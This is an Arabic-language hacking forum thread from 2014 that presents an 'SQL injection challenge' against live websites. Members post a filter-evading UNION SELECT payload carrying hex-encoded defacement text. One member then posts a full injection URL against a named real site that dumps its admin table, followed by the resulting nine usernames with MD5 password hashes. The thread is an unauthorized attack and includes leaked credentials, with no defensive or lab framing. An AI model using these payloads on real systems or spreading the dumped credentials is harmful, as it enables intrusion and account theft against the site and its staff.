New SQL Injection Challenge #3

الموضوع في '[ SQL-injection ]' بواسطة qusaialhaddad, بتاريخ ‏30 أغسطس 2014.

الوسوم:
حالة الموضوع:
مغلق
  1. qusaialhaddad

    qusaialhaddad Developer

    الأنتساب:
    ‏4 أغسطس 2014
    المشاركات:
    68
    الإعجابات المتلقاة:
    5
    نقاط الجائزة:
    8
  2. Egy HacKerS

    Egy HacKerS DeveloPer Plus

    الأنتساب:
    ‏1 ديسمبر 2012
    المشاركات:
    113
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    18
    الوظيفة:
    HacKer
    الإقامة:
    Egy
    رد: New SQL Injection Challenge #3

    مبدع يابطل تقبل مروري المتواضع
     
  3. IM MATRIX

    IM MATRIX Developer

    الأنتساب:
    ‏1 ابريل 2012
    المشاركات:
    86
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    رد: New SQL Injection Challenge #3

    Thank you
     
  4. Ghost Libya

    Ghost Libya Developer

    الأنتساب:
    ‏17 ابريل 2014
    المشاركات:
    69
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    رد: New SQL Injection Challenge #3

    جاري الفحص
     
  5. thelasthacker

    thelasthacker <div class="smallfont"><span style="font-weight: b V • I • P

    الأنتساب:
    ‏23 مايو 2014
    المشاركات:
    133
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    18
    رد: New SQL Injection Challenge #3

    these infected is number 1
    exploit this
    Best Price in Sri Lanka /**//*!12345UNION SELECT*//**/ 0x3c666f6e7420636f6c6f723d22726564223e20496e6a656374656420427920546833204c6173744861636b3352203c2f666f6e743e,2,3,4+--+/
     
  6. qusaialhaddad

    qusaialhaddad Developer

    الأنتساب:
    ‏4 أغسطس 2014
    المشاركات:
    68
    الإعجابات المتلقاة:
    5
    نقاط الجائزة:
    8
    رد: New SQL Injection Challenge #3

    The number of columns are wrong
     
  7. thelasthacker

    thelasthacker <div class="smallfont"><span style="font-weight: b V • I • P

    الأنتساب:
    ‏23 مايو 2014
    المشاركات:
    133
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    18
    رد: New SQL Injection Challenge #3

    لكني استخرجت
    user and pass
    كيف ممكنتوضح اخي
     
  8. HaMaM-HaCkEr

    HaMaM-HaCkEr DeveloPer Plus

    الأنتساب:
    ‏22 نوفمبر 2012
    المشاركات:
    117
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    16
    رد: New SQL Injection Challenge #3

    شكرآ ليك اخي :ُeُeF:
     
  9. qusaialhaddad

    qusaialhaddad Developer

    الأنتساب:
    ‏4 أغسطس 2014
    المشاركات:
    68
    الإعجابات المتلقاة:
    5
    نقاط الجائزة:
    8
    رد: New SQL Injection Challenge #3

    It has 2 Columns

    Best Price in Sri Lanka


    you can notice the vulnerable columns near vote and Rating.

    Let me know if you need any explanation.
     
  10. thelasthacker

    thelasthacker <div class="smallfont"><span style="font-weight: b V • I • P

    الأنتساب:
    ‏23 مايو 2014
    المشاركات:
    133
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    18
    رد: New SQL Injection Challenge #3

    look bro my exploit

    http://www.puptaguig.net/eventwithinfo.php?id=122' UNION SELECT (select+group_concat(username,0x3a,password)+from+admin),2+--+/



    the result is

    rendell:1ba455ae9d4db82ef798110809a546f5,
    zimara:9b9780171c0166d4664303ab89b93ac5,
    almi:ec3a1ba69dbed9d849b738b47a7ed0d4,
    nuguid:b170bba2fbda91bc6c57a90e693527a8,
    deluna:4aa94b75f2dae54a83d3546ab4fee00a,
    nursejoy:fd293fecf54deae4f3e79e93ee4d81c2,
    zarco:92608ff4dd8f6d8b60565d8c9a32d52c
    ,pelayo:03a7071f4e287891dc99032dcdb2a759,j
    acinto:0888d5606eb4fbd9a70428a75834e36c​
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة